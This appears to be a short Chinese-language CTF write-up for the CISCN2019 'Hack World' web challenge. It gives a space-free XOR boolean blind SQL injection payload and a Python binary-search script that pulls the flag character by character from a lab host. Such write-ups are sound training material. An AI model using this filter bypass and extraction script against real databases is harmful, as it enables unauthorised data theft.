[CISCN2019 华北赛区 Day2 Web1]Hack World
输入1,2会正常的回显,输入空格会返回bool false,而输入其他攻击性的sql语句,会显示
但是输入1^1可以正常回显
所以结合sql盲注,输入
1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))
可以正常回显
ps:之前看到有个大佬的
之后菜鸡借鉴了一下大佬的二分代码
import requests
import time
url =" http://6848dcc9-35e3-4a89-a9a0-0b96eaa95bd3.node3.buuoj.cn"
payload = {
"id" : ""
}
result = ""
for i in range(1,100):
l = 33
r =130
mid = (l+r)>>1
while(l<r):
payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
html = requests.post(url,data=payload)
print(payload)
if "Hello" in html.text:
l = mid+1
else:
r = mid
mid = (l+r)>>1
if(chr(mid)==" "):
break
result = result + chr(mid)
print(result)
print("flag: " ,result)
成功出现flag
参考链接:
https://blog.csdn.net/weixin_44077544/article/details/102669185